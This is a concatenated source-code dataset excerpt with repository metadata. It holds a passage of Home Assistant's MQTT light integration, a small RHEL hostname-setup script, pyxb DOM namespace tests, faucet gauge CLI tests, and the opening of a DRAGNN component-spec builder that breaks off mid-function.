restore_state(ATTR_RGB_COLOR)
restore_state(ATTR_HS_COLOR, ATTR_RGB_COLOR)
@callback
@log_messages(self.hass, self.entity_id)
def rgbw_received(msg):
"""Handle new MQTT messages for RGBW."""
rgbw = _rgbx_received(
msg,
CONF_RGBW_VALUE_TEMPLATE,
COLOR_MODE_RGBW,
color_util.color_rgbw_to_rgb,
)
if not rgbw:
return
self._rgbw_color = rgbw
self.async_write_ha_state()
add_topic(CONF_RGBW_STATE_TOPIC, rgbw_received)
restore_state(ATTR_RGBW_COLOR)
@callback
@log_messages(self.hass, self.entity_id)
def rgbww_received(msg):
"""Handle new MQTT messages for RGBWW."""
rgbww = _rgbx_received(
msg,
CONF_RGBWW_VALUE_TEMPLATE,
COLOR_MODE_RGBWW,
color_util.color_rgbww_to_rgb,
)
if not rgbww:
return
self._rgbww_color = rgbww
self.async_write_ha_state()
add_topic(CONF_RGBWW_STATE_TOPIC, rgbww_received)
restore_state(ATTR_RGBWW_COLOR)
@callback
@log_messages(self.hass, self.entity_id)
def color_mode_received(msg):
"""Handle new MQTT messages for color mode."""
payload = self._value_templates[CONF_COLOR_MODE_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty color mode message from '%s'", msg.topic)
return
self._color_mode = payload
self.async_write_ha_state()
add_topic(CONF_COLOR_MODE_STATE_TOPIC, color_mode_received)
restore_state(ATTR_COLOR_MODE)
@callback
@log_messages(self.hass, self.entity_id)
def color_temp_received(msg):
"""Handle new MQTT messages for color temperature."""
payload = self._value_templates[CONF_COLOR_TEMP_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty color temp message from '%s'", msg.topic)
return
if self._optimistic_color_mode:
self._color_mode = COLOR_MODE_COLOR_TEMP
self._color_temp = int(payload)
self.async_write_ha_state()
add_topic(CONF_COLOR_TEMP_STATE_TOPIC, color_temp_received)
restore_state(ATTR_COLOR_TEMP)
@callback
@log_messages(self.hass, self.entity_id)
def effect_received(msg):
"""Handle new MQTT messages for effect."""
payload = self._value_templates[CONF_EFFECT_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty effect message from '%s'", msg.topic)
return
self._effect = payload
self.async_write_ha_state()
add_topic(CONF_EFFECT_STATE_TOPIC, effect_received)
restore_state(ATTR_EFFECT)
@callback
@log_messages(self.hass, self.entity_id)
def hs_received(msg):
"""Handle new MQTT messages for hs color."""
payload = self._value_templates[CONF_HS_VALUE_TEMPLATE](msg.payload, None)
if not payload:
_LOGGER.debug("Ignoring empty hs message from '%s'", msg.topic)
return
try:
hs_color = tuple(float(val) for val in payload.split(",", 2))
if self._optimistic_color_mode:
self._color_mode = COLOR_MODE_HS
self._hs_color = hs_color
self.async_write_ha_state()
except ValueError:
_LOGGER.debug("Failed to parse hs state update: '%s'", payload)
add_topic(CONF_HS_STATE_TOPIC, hs_received)
restore_state(ATTR_HS_COLOR)
@callback
@log_messages(self.hass, self.entity_id)
def white_value_received(msg):
"""Handle new MQTT messages for white value."""
payload = self._value_templates[CONF_WHITE_VALUE_TEMPLATE](
msg.payload, None
)
if not payload:
_LOGGER.debug("Ignoring empty white value message from '%s'", msg.topic)
return
device_value = float(payload)
percent_white = device_value / self._config[CONF_WHITE_VALUE_SCALE]
self._white_value = percent_white * 255
self.async_write_ha_state()
add_topic(CONF_WHITE_VALUE_STATE_TOPIC, white_value_received)
restore_state(ATTR_WHITE_VALUE)
@callback
@log_messages(self.hass, self.entity_id)
def xy_received(msg):
"""Handle new MQTT messages for xy color."""
payload = self._value_templates[CONF_XY_VALUE_TEMPLATE](msg.payload, None)
if not payload:
_LOGGER.debug("Ignoring empty xy-color message from '%s'", msg.topic)
return
xy_color = tuple(float(val) for val in payload.split(","))
if self._optimistic_color_mode:
self._color_mode = COLOR_MODE_XY
if self._legacy_mode:
self._hs_color = color_util.color_xy_to_hs(*xy_color)
else:
self._xy_color = xy_color
self.async_write_ha_state()
add_topic(CONF_XY_STATE_TOPIC, xy_received)
restore_state(ATTR_XY_COLOR)
restore_state(ATTR_HS_COLOR, ATTR_XY_COLOR)
self._sub_state = await subscription.async_subscribe_topics(
self.hass, self._sub_state, topics
)
@property
def brightness(self):
"""Return the brightness of this light between 0..255."""
brightness = self._brightness
if brightness:
brightness = min(round(brightness), 255)
return brightness
@property
def color_mode(self):
"""Return current color mode."""
if self._legacy_mode:
return None
return self._color_mode
@property
def hs_color(self):
"""Return the hs color value."""
if not self._legacy_mode:
return self._hs_color
        # Legacy mode: hs_color is only meaningful while white_value == 0
if self._white_value:
return None
return self._hs_color
@property
def rgb_color(self):
"""Return the rgb color value."""
return self._rgb_color
@property
def rgbw_color(self):
"""Return the rgbw color value."""
return self._rgbw_color
@property
def rgbww_color(self):
"""Return the rgbww color value."""
return self._rgbww_color
@property
def xy_color(self):
"""Return the xy color value."""
return self._xy_color
@property
def color_temp(self):
"""Return the color temperature in mired."""
if not self._legacy_mode:
return self._color_temp
# Legacy mode, gate color_temp with white_value > 0
supports_color = (
self._topic[CONF_RGB_COMMAND_TOPIC]
or self._topic[CONF_HS_COMMAND_TOPIC]
or self._topic[CONF_XY_COMMAND_TOPIC]
)
if self._white_value or not supports_color:
return self._color_temp
return None
@property
def min_mireds(self):
"""Return the coldest color_temp that this light supports."""
return self._config.get(CONF_MIN_MIREDS, super().min_mireds)
@property
def max_mireds(self):
"""Return the warmest color_temp that this light supports."""
return self._config.get(CONF_MAX_MIREDS, super().max_mireds)
@property
def white_value(self):
"""Return the white property."""
white_value = self._white_value
if white_value:
white_value = min(round(white_value), 255)
return white_value
return None
@property
def is_on(self):
"""Return true if device is on."""
return self._state
@property
def assumed_state(self):
"""Return true if we do optimistic updates."""
return self._optimistic
@property
def effect_list(self):
"""Return the list of supported effects."""
return self._config.get(CONF_EFFECT_LIST)
@property
def effect(self):
"""Return the current effect."""
return self._effect
@property
def supported_color_modes(self):
"""Flag supported color modes."""
if self._legacy_mode:
return None
return self._supported_color_modes
@property
def supported_features(self):
"""Flag supported features."""
supported_features = 0
supported_features |= (
self._topic[CONF_EFFECT_COMMAND_TOPIC] is not None and SUPPORT_EFFECT
)
if not self._legacy_mode:
return supported_features
# Legacy mode
supported_features |= self._topic[CONF_RGB_COMMAND_TOPIC] is not None and (
SUPPORT_COLOR | SUPPORT_BRIGHTNESS
)
supported_features |= (
self._topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None
and SUPPORT_BRIGHTNESS
)
supported_features |= (
self._topic[CONF_COLOR_TEMP_COMMAND_TOPIC] is not None
and SUPPORT_COLOR_TEMP
)
supported_features |= (
self._topic[CONF_HS_COMMAND_TOPIC] is not None and SUPPORT_COLOR
)
supported_features |= (
self._topic[CONF_WHITE_VALUE_COMMAND_TOPIC] is not None
and SUPPORT_WHITE_VALUE
)
supported_features |= (
self._topic[CONF_XY_COMMAND_TOPIC] is not None and SUPPORT_COLOR
)
return supported_features
async def async_turn_on(self, **kwargs): # noqa: C901
"""Turn the device on.
This method is a coroutine.
"""
should_update = False
on_command_type = self._config[CONF_ON_COMMAND_TYPE]
def publish(topic, payload):
"""Publish an MQTT message."""
mqtt.async_publish(
self.hass,
self._topic[topic],
payload,
self._config[CONF_QOS],
self._config[CONF_RETAIN],
)
def scale_rgbx(color, brightness=None):
"""Scale RGBx for brightness."""
if brightness is None:
# If there's a brightness topic set, we don't want to scale the RGBx
# values given using the brightness.
if self._topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None:
brightness = 255
else:
brightness = kwargs.get(
ATTR_BRIGHTNESS, self._brightness if self._brightness else 255
)
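            # Illustration: with brightness 128, (255, 128, 0) scales to (128, 64, 0).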
return tuple(int(channel * brightness / 255) for channel in color)
def render_rgbx(color, template, color_mode):
"""Render RGBx payload."""
tpl = self._command_templates[template]
if tpl:
keys = ["red", "green", "blue"]
if color_mode == COLOR_MODE_RGBW:
keys.append("white")
elif color_mode == COLOR_MODE_RGBWW:
keys.extend(["cold_white", "warm_white"])
rgb_color_str = tpl(zip(keys, color))
else:
rgb_color_str = ",".join(str(channel) for channel in color)
return rgb_color_str
def set_optimistic(attribute, value, color_mode=None, condition_attribute=None):
"""Optimistically update a state attribute."""
if condition_attribute is None:
condition_attribute = attribute
if not self._is_optimistic(condition_attribute):
return False
if color_mode and self._optimistic_color_mode:
self._color_mode = color_mode
setattr(self, f"_{attribute}", value)
return True
if on_command_type == "first":
publish(CONF_COMMAND_TOPIC, self._payload["on"])
should_update = True
# If brightness is being used instead of an on command, make sure
# there is a brightness input. Either set the brightness to our
# saved value or the maximum value if this is the first call
elif (
on_command_type == "brightness"
and ATTR_BRIGHTNESS not in kwargs
and ATTR_WHITE not in kwargs
):
kwargs[ATTR_BRIGHTNESS] = self._brightness if self._brightness else 255
hs_color = kwargs.get(ATTR_HS_COLOR)
if (
hs_color
and self._topic[CONF_RGB_COMMAND_TOPIC] is not None
and self._legacy_mode
):
# Legacy mode: Convert HS to RGB
rgb = scale_rgbx(color_util.color_hsv_to_RGB(*hs_color, 100))
rgb_s = render_rgbx(rgb, CONF_RGB_COMMAND_TEMPLATE, COLOR_MODE_RGB)
publish(CONF_RGB_COMMAND_TOPIC, rgb_s)
should_update |= set_optimistic(
ATTR_HS_COLOR, hs_color, condition_attribute=ATTR_RGB_COLOR
)
if hs_color and self._topic[CONF_HS_COMMAND_TOPIC] is not None:
publish(CONF_HS_COMMAND_TOPIC, f"{hs_color[0]},{hs_color[1]}")
should_update |= set_optimistic(ATTR_HS_COLOR, hs_color, COLOR_MODE_HS)
if (
hs_color
and self._topic[CONF_XY_COMMAND_TOPIC] is not None
and self._legacy_mode
):
# Legacy mode: Convert HS to XY
xy_color = color_util.color_hs_to_xy(*hs_color)
publish(CONF_XY_COMMAND_TOPIC, f"{xy_color[0]},{xy_color[1]}")
should_update |= set_optimistic(
ATTR_HS_COLOR, hs_color, condition_attribute=ATTR_XY_COLOR
)
if (
(rgb := kwargs.get(ATTR_RGB_COLOR))
and self._topic[CONF_RGB_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
scaled = scale_rgbx(rgb)
rgb_s = render_rgbx(scaled, CONF_RGB_COMMAND_TEMPLATE, COLOR_MODE_RGB)
publish(CONF_RGB_COMMAND_TOPIC, rgb_s)
should_update |= set_optimistic(ATTR_RGB_COLOR, rgb, COLOR_MODE_RGB)
if (
(rgbw := kwargs.get(ATTR_RGBW_COLOR))
and self._topic[CONF_RGBW_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
scaled = scale_rgbx(rgbw)
rgbw_s = render_rgbx(scaled, CONF_RGBW_COMMAND_TEMPLATE, COLOR_MODE_RGBW)
publish(CONF_RGBW_COMMAND_TOPIC, rgbw_s)
should_update |= set_optimistic(ATTR_RGBW_COLOR, rgbw, COLOR_MODE_RGBW)
if (
(rgbww := kwargs.get(ATTR_RGBWW_COLOR))
and self._topic[CONF_RGBWW_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
scaled = scale_rgbx(rgbww)
rgbww_s = render_rgbx(scaled, CONF_RGBWW_COMMAND_TEMPLATE, COLOR_MODE_RGBWW)
publish(CONF_RGBWW_COMMAND_TOPIC, rgbww_s)
should_update |= set_optimistic(ATTR_RGBWW_COLOR, rgbww, COLOR_MODE_RGBWW)
if (
(xy_color := kwargs.get(ATTR_XY_COLOR))
and self._topic[CONF_XY_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
publish(CONF_XY_COMMAND_TOPIC, f"{xy_color[0]},{xy_color[1]}")
should_update |= set_optimistic(ATTR_XY_COLOR, xy_color, COLOR_MODE_XY)
if (
ATTR_BRIGHTNESS in kwargs
and self._topic[CONF_BRIGHTNESS_COMMAND_TOPIC] is not None
):
brightness_normalized = kwargs[ATTR_BRIGHTNESS] / 255
brightness_scale = self._config[CONF_BRIGHTNESS_SCALE]
device_brightness = min(
round(brightness_normalized * brightness_scale), brightness_scale
)
# Make sure the brightness is not rounded down to 0
device_brightness = max(device_brightness, 1)
publish(CONF_BRIGHTNESS_COMMAND_TOPIC, device_brightness)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
elif (
ATTR_BRIGHTNESS in kwargs
and ATTR_HS_COLOR not in kwargs
and self._topic[CONF_RGB_COMMAND_TOPIC] is not None
and self._legacy_mode
):
# Legacy mode
hs_color = self._hs_color if self._hs_color is not None else (0, 0)
brightness = kwargs[ATTR_BRIGHTNESS]
rgb = scale_rgbx(color_util.color_hsv_to_RGB(*hs_color, 100), brightness)
rgb_s = render_rgbx(rgb, CONF_RGB_COMMAND_TEMPLATE, COLOR_MODE_RGB)
publish(CONF_RGB_COMMAND_TOPIC, rgb_s)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
elif (
ATTR_BRIGHTNESS in kwargs
and ATTR_RGB_COLOR not in kwargs
and self._topic[CONF_RGB_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
rgb_color = self._rgb_color if self._rgb_color is not None else (255,) * 3
rgb = scale_rgbx(rgb_color, kwargs[ATTR_BRIGHTNESS])
rgb_s = render_rgbx(rgb, CONF_RGB_COMMAND_TEMPLATE, COLOR_MODE_RGB)
publish(CONF_RGB_COMMAND_TOPIC, rgb_s)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
elif (
ATTR_BRIGHTNESS in kwargs
and ATTR_RGBW_COLOR not in kwargs
and self._topic[CONF_RGBW_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
rgbw_color = (
self._rgbw_color if self._rgbw_color is not None else (255,) * 4
)
rgbw = scale_rgbx(rgbw_color, kwargs[ATTR_BRIGHTNESS])
rgbw_s = render_rgbx(rgbw, CONF_RGBW_COMMAND_TEMPLATE, COLOR_MODE_RGBW)
publish(CONF_RGBW_COMMAND_TOPIC, rgbw_s)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
elif (
ATTR_BRIGHTNESS in kwargs
and ATTR_RGBWW_COLOR not in kwargs
and self._topic[CONF_RGBWW_COMMAND_TOPIC] is not None
and not self._legacy_mode
):
rgbww_color = (
self._rgbww_color if self._rgbww_color is not None else (255,) * 5
)
rgbww = scale_rgbx(rgbww_color, kwargs[ATTR_BRIGHTNESS])
rgbww_s = render_rgbx(rgbww, CONF_RGBWW_COMMAND_TEMPLATE, COLOR_MODE_RGBWW)
publish(CONF_RGBWW_COMMAND_TOPIC, rgbww_s)
should_update |= set_optimistic(ATTR_BRIGHTNESS, kwargs[ATTR_BRIGHTNESS])
if (
ATTR_COLOR_TEMP in kwargs
and self._topic[CONF_COLOR_TEMP_COMMAND_TOPIC] is not None
):
color_temp = int(kwargs[ATTR_COLOR_TEMP])
tpl = self._command_templates[CONF_COLOR_TEMP_COMMAND_TEMPLATE]
if tpl:
color_temp = tpl({"value": color_temp})
publish(CONF_COLOR_TEMP_COMMAND_TOPIC, color_temp)
should_update |= set_optimistic(
ATTR_COLOR_TEMP, kwargs[ATTR_COLOR_TEMP], COLOR_MODE_COLOR_TEMP
)
if ATTR_EFFECT in kwargs and self._topic[CONF_EFFECT_COMMAND_TOPIC] is not None:
effect = kwargs[ATTR_EFFECT]
if effect in self._config.get(CONF_EFFECT_LIST):
publish(CONF_EFFECT_COMMAND_TOPIC, effect)
should_update |= set_optimistic(ATTR_EFFECT, effect)
if ATTR_WHITE in kwargs and self._topic[CONF_WHITE_COMMAND_TOPIC] is not None:
percent_white = float(kwargs[ATTR_WHITE]) / 255
white_scale = self._config[CONF_WHITE_SCALE]
device_white_value = min(round(percent_white * white_scale), white_scale)
publish(CONF_WHITE_COMMAND_TOPIC, device_white_value)
should_update |= set_optimistic(
ATTR_BRIGHTNESS,
kwargs[ATTR_WHITE],
COLOR_MODE_WHITE,
)
if (
ATTR_WHITE_VALUE in kwargs
and self._topic[CONF_WHITE_VALUE_COMMAND_TOPIC] is not None
):
percent_white = float(kwargs[ATTR_WHITE_VALUE]) / 255
white_scale = self._config[CONF_WHITE_VALUE_SCALE]
device_white_value = min(round(percent_white * white_scale), white_scale)
publish(CONF_WHITE_VALUE_COMMAND_TOPIC, device_white_value)
should_update |= set_optimistic(ATTR_WHITE_VALUE, kwargs[ATTR_WHITE_VALUE])
if on_command_type == "last":
publish(CONF_COMMAND_TOPIC, self._payload["on"])
should_update = True
if self._optimistic:
# Optimistically assume that the light has changed state.
self._state = True
should_update = True
if should_update:
self.async_write_ha_state()
async def async_turn_off(self, **kwargs):
"""Turn the device off.
This method is a coroutine.
"""
mqtt.async_publish(
self.hass,
self._topic[CONF_COMMAND_TOPIC],
self._payload["off"],
self._config[CONF_QOS],
self._config[CONF_RETAIN],
)
if self._optimistic:
# Optimistically assume that the light has changed state.
self._state = False
self.async_write_ha_state()
|
Danielhiversen/home-assistant
|
homeassistant/components/mqtt/light/schema_basic.py
|
Python
|
apache-2.0
| 41,759
|
#!/usr/bin/env python
PRIMARY_OS = 'RHEL-7.1'
PRIMARY = '''#!/bin/sh
#
FQDN="{fqdn}"
# /etc/hostname - /etc/hosts
sed -i "1 c\\127.0.0.1 $FQDN localhost" /etc/hosts
echo $FQDN > /etc/hostname
service hostname restart
sleep 5
{{dinfo}}
'''
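# Note: "{fqdn}" above is a str.format() placeholder filled in when the script is
# rendered; "{{dinfo}}" is escaped so a literal "{dinfo}" survives that pass,
# presumably for a later substitution step in the surrounding lab tooling (assumption).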
def pre_process():
"""Anything added to this function is executed before launching the instances"""
pass
def post_process():
"""Anything added to this function is executed after launching the instances"""
pass
|
superseb/train
|
train/labs/base/scripts/rhel-7.1.py
|
Python
|
apache-2.0
| 470
|
# -*- coding: utf-8 -*-
import logging
if __name__ == '__main__':
logging.basicConfig()
_log = logging.getLogger(__name__)
import unittest
from pyxb.utils.domutils import *
from xml.dom import Node
import xml.dom
import pyxb.namespace
def NonTextSibling (n):
while n.TEXT_NODE == n.nodeType:
n = n.nextSibling
return n
class TestInScopeNames (unittest.TestCase):
def show (self, node):
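        # Collect the node's in-scope namespaces, then drop the implicit 'xml' and
        # 'xmlns' bindings so the tests only see declarations made by the document.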
xmlns_map = pyxb.namespace.resolution.NamespaceContext.GetNodeContext(node).inScopeNamespaces()
#print '%s: %s' % (node.nodeName, ' ; '.join([ '%s=%s' % (_k, _v.uri()) for (_k, _v) in xmlns_map.items()]))
xmlns_map = xmlns_map.copy()
self.assertEqual(pyxb.namespace.XML.uri(), xmlns_map.pop('xml').uri())
self.assertEqual(pyxb.namespace.XMLNamespaces.uri(), xmlns_map.pop('xmlns').uri())
return xmlns_map
def test_6_2_2 (self):
xml = '''<?xml version="1.0"?>
<!-- initially, the default namespace is "books" -->
<book xmlns='urn:loc.gov:books'
xmlns:isbn='urn:ISBN:0-395-36341-6'>
<title>Cheaper by the Dozen</title>
<isbn:number>1568491379</isbn:number>
<notes>
<p xmlns='http://www.w3.org/1999/xhtml'>
This is a <i>funny</i> book!
</p>
<p>another graf without namespace change</p>
</notes>
</book>'''
book = StringToDOM(xml).documentElement
self.assertEqual('book', book.localName)
ns_ctx = pyxb.namespace.resolution.NamespaceContext.GetNodeContext(book)
xmlns_map = self.show(book)
self.assertEqual(2, len(xmlns_map))
self.assertEqual('urn:loc.gov:books', xmlns_map[None].uri())
self.assertEqual('urn:ISBN:0-395-36341-6', xmlns_map['isbn'].uri())
title = NonTextSibling(book.firstChild)
self.assertEqual('title', title.localName)
        xmlns_map = self.show(title)
self.assertEqual(2, len(xmlns_map))
self.assertEqual('urn:loc.gov:books', xmlns_map[None].uri())
self.assertEqual('urn:ISBN:0-395-36341-6', xmlns_map['isbn'].uri())
number = NonTextSibling(title.nextSibling)
notes = NonTextSibling(number.nextSibling)
while notes.TEXT_NODE == notes.nodeType:
notes = notes.nextSibling
self.assertEqual('notes', notes.localName)
p = NonTextSibling(notes.firstChild)
xmlns_map = self.show(p)
self.assertEqual('p', p.localName)
self.assertEqual(2, len(xmlns_map))
self.assertEqual(None, xmlns_map.get('xsi'))
self.assertEqual('http://www.w3.org/1999/xhtml', xmlns_map[None].uri())
self.assertEqual('urn:ISBN:0-395-36341-6', xmlns_map['isbn'].uri())
x = NonTextSibling(p.nextSibling)
xmlns_map = self.show(x)
self.assertEqual('p', x.localName)
self.assertEqual(2, len(xmlns_map))
self.assertEqual('urn:loc.gov:books', xmlns_map[None].uri())
self.assertEqual('urn:ISBN:0-395-36341-6', xmlns_map['isbn'].uri())
def test_6_2_3 (self):
xml = '''<?xml version='1.0'?>
<Beers>
<table xmlns='http://www.w3.org/1999/xhtml'>
<th><td>Name</td><td>Origin</td><td>Description</td></th>
<tr>
<td><brandName xmlns="">Huntsman</brandName></td>
<td><origin xmlns="">Bath, UK</origin></td>
<td>
<details xmlns=""><class>Bitter</class><hop>Fuggles</hop>
<pro>Wonderful hop, light alcohol, good summer beer</pro>
<con>Fragile; excessive variance pub to pub</con>
</details>
</td>
</tr>
</table>
</Beers>'''
Beers = StringToDOM(xml).documentElement
ns_ctx = pyxb.namespace.resolution.NamespaceContext.GetNodeContext(Beers)
xmlns_map = self.show(Beers)
self.assertEqual(0, len(xmlns_map))
table = NonTextSibling(Beers.firstChild)
self.assertEqual('table', table.localName)
xmlns_map = self.show(table)
self.assertEqual(1, len(xmlns_map))
self.assertEqual('http://www.w3.org/1999/xhtml', xmlns_map[None].uri())
th = NonTextSibling(table.firstChild)
self.assertEqual('th', th.localName)
tr = NonTextSibling(th.nextSibling)
self.assertEqual('tr', tr.localName)
#brandName = table.firstChild.nextSibling.nextSibling.nextSibling.firstChild.nextSibling.nextSibling.nextSibling.firstChild
td = NonTextSibling(tr.firstChild)
self.assertEqual('td', td.localName)
brandName = td.firstChild
self.assertEqual('brandName', brandName.localName)
xmlns_map = self.show(brandName)
self.assertEqual(0, len(xmlns_map))
class TestNamespaceURIs (unittest.TestCase):
# Make sure we agree with xml.dom on what the core namespace URIs are
def testURI (self):
self.assertTrue(xml.dom.EMPTY_NAMESPACE is None)
self.assertEqual(xml.dom.XML_NAMESPACE, pyxb.namespace.XML.uri())
self.assertEqual(xml.dom.XMLNS_NAMESPACE, pyxb.namespace.XMLNamespaces.uri())
self.assertEqual(xml.dom.XHTML_NAMESPACE, pyxb.namespace.XHTML.uri())
if '__main__' == __name__:
unittest.main()
|
jonfoster/pyxb-upstream-mirror
|
tests/utils/test-domutils.py
|
Python
|
apache-2.0
| 5,087
|
#!/usr/bin/env python
"""Test GAUGE main."""
# Copyright (C) 2015 Brad Cowie, Christopher Lorier and Joe Stringer.
# Copyright (C) 2015 Research and Innovation Advanced Network New Zealand Ltd.
# Copyright (C) 2015--2019 The Contributors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
# pylint: disable=no-name-in-module
# pylint: disable=import-error
from faucet.__main__ import parse_args, build_ryu_args
class MainTestCase(unittest.TestCase): # pytype: disable=module-attr
"""Test __main__ methods."""
def test_parse_args(self):
"""Sanity check argument parsing."""
self.assertFalse(parse_args([]).verbose)
self.assertTrue(parse_args(['--verbose']).verbose)
def test_build_ryu_args(self):
"""Test build_ryu_args()."""
self.assertTrue(build_ryu_args(['gauge', '--use-stderr', '--use-syslog', '--verbose']))
self.assertFalse(build_ryu_args(['gauge', '--version']))
if __name__ == "__main__":
unittest.main() # pytype: disable=module-attr
|
trungdtbk/faucet
|
tests/unit/gauge/test_main.py
|
Python
|
apache-2.0
| 1,527
|
# Copyright 2017 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils for building DRAGNN specs."""
import tensorflow as tf
from dragnn.protos import spec_pb2
from dragnn.python import lexicon
from syntaxnet.ops import gen_parser_ops
from syntaxnet.util import check
class ComponentSpecBuilder(object):
"""Wrapper to help construct SyntaxNetComponent specifications.
  This class will help make sure that ComponentSpecs are consistent with the
expectations of the SyntaxNet Component backend. It contains defaults used to
create LinkFeatureChannel specifications according to the network_unit and
  transition_system of the source component. It also encapsulates common recipes
for hooking up FML and translators.
Attributes:
spec: The dragnn.ComponentSpec proto.
"""
def __init__(self,
name,
builder='DynamicComponentBuilder',
backend='SyntaxNetComponent'):
"""Initializes the ComponentSpec with some defaults for SyntaxNet.
Args:
name: The name of this Component in the pipeline.
builder: The component builder type.
backend: The component backend type.
"""
self.spec = spec_pb2.ComponentSpec(
name=name,
backend=self.make_module(backend),
component_builder=self.make_module(builder))
def make_module(self, name, **kwargs):
"""Forwards kwargs to easily created a RegisteredModuleSpec.
Note: all kwargs should be string-valued.
Args:
name: The registered name of the module.
**kwargs: Proto fields to be specified in the module.
Returns:
Newly created RegisteredModuleSpec.
"""
return spec_pb2.RegisteredModuleSpec(
registered_name=name, parameters=kwargs)
def default_source_layer(self):
"""Returns the default source_layer setting for this ComponentSpec.
Usually links are intended for a specific layer in the network unit.
For common network units, this returns the hidden layer intended
to be read by recurrent and cross-component connections.
Returns:
String name of default network layer.
Raises:
ValueError: if no default is known for the given setup.
"""
for network, default_layer in [('FeedForwardNetwork', 'layer_0'),
('LayerNormBasicLSTMNetwork', 'state_h_0'),
('LSTMNetwork', 'layer_0'),
('IdentityNetwork', 'input_embeddings')]:
if self.spec.network_unit.registered_name.endswith(network):
return default_layer
raise ValueError('No default source for network unit: %s' %
self.spec.network_unit)
def default_token_translator(self):
"""Returns the default source_translator setting for token representations.
Most links are token-based: given a target token index, retrieve a learned
representation for that token from this component. This depends on the
transition system; e.g. we should make sure that left-to-right sequence
models reverse the incoming token index when looking up representations from
a right-to-left model.
Returns:
String name of default translator for this transition system.
Raises:
ValueError: if no default is known for the given setup.
"""
transition_spec = self.spec.transition_system
if transition_spec.registered_name == 'arc-standard':
return 'shift-reduce-step'
if transition_spec.registered_name in ('shift-only', 'tagger', 'morpher',
'lm-transitions', 'dependency-label',
'category'):
if 'left_to_right' in transition_spec.parameters:
if transition_spec.parameters['left_to_right'] == 'false':
return 'reverse-token'
return 'identity'
raise ValueError('Invalid transition spec: %s' % str(transition_spec))
def add_token_link(self, source=None, source_layer=None, **kwargs):
"""Adds a link to source's token representations using default settings.
Constructs a LinkedFeatureChannel proto and adds it to the spec, using
defaults to assign the name, component, translator, and layer of the
channel. The user must provide fml and embedding_dim.
Args:
source: SyntaxComponentBuilder object to pull representations from.
source_layer: Optional override for a source layer instead of the default.
**kwargs: Forwarded arguments to the LinkedFeatureChannel proto.
"""
if source_layer is None:
source_layer = source.default_source_layer()
self.spec.linked_feature.add(
name=source.spec.name,
source_component=source.spec.name,
source_layer=source_layer,
source_translator=source.default_token_translator(),
**kwargs)
def add_rnn_link(self, source_layer=None, **kwargs):
"""Adds a recurrent link to this component using default settings.
This adds the connection to the previous time step only to the network. It
constructs a LinkedFeatureChannel proto and adds it to the spec, using
defaults to assign the name, component, translator, and layer of the
channel. The user must provide the embedding_dim only.
Args:
source_layer: Optional override for a source layer instead of the default.
**kwargs: Forwarded arguments to the LinkedFeatureChannel proto.
"""
if source_layer is None:
source_layer = self.default_source_layer()
self.spec.linked_feature.add(
name='rnn',
source_layer=source_layer,
source_component=self.spec.name,
source_translator='history',
fml='constant',
**kwargs)
def set_transition_system(self, *args, **kwargs):
"""Shorthand to set transition_system using kwargs."""
self.spec.transition_system.CopyFrom(self.make_module(*args, **kwargs))
def set_network_unit(self, *args, **kwargs):
"""Shorthand to set network_unit using kwargs."""
self.spec.network_unit.CopyFrom(self.make_module(*args, **kwargs))
def add_fixed_feature(self, **kwargs):
"""Shorthand to add a fixed_feature using kwargs."""
self.spec.fixed_feature.add(**kwargs)
def add_link(self,
source,
source_layer=None,
source_translator='identity',
name=None,
**kwargs):
"""Add a link using default naming and layers only."""
if source_layer is None:
source_layer = source.default_source_layer()
if name is None:
name = source.spec.name
self.spec.linked_feature.add(
source_component=source.spec.name,
source_layer=source_layer,
name=name,
source_translator=source_translator,
**kwargs)
def fill_from_resources(self, resource_path, tf_master=''):
"""Fills in feature sizes and vocabularies using SyntaxNet lexicon.
Must be called before the spec is ready to be used to build TensorFlow
graphs. Requires a SyntaxNet lexicon built at the resource_path. Using the
lexicon, this will call the SyntaxNet custom ops to return the number of
features and vocabulary sizes based on the FML specifications and the
lexicons. It will also compute the number of actions of the transition
system.
This will often CHECK-fail if the spec doesn't correspond to a valid
transition system or feature setup.
Args:
resource_path: Path to the lexicon.
tf_master: TensorFlow master executor (string, defaults to '' to use the
local instance).
"""
check.IsTrue(
self.spec.transition_system.registered_name,
'Set a transition system before calling fill_from_resources().')
context = lexicon.create_lexicon_context(resource_path)
# If there are any transition system-specific params or resources,
# copy them over into the context.
for resource in self.spec.resource:
context.input.add(name=resource.name).part.add(
file_pattern=resource.part[0].file_pattern)
for key, value in self.spec.transition_system.parameters.iteritems():
context.parameter.add(name=key, value=value)
context.parameter.add(
name='brain_parser_embedding_dims',
value=';'.join([str(x.embedding_dim) for x in self.spec.fixed_feature]))
context.parameter.add(
name='brain_parser_features',
value=';'.join([x.fml for x in self.spec.fixed_feature]))
context.parameter.add(
name='brain_parser_predicate_maps',
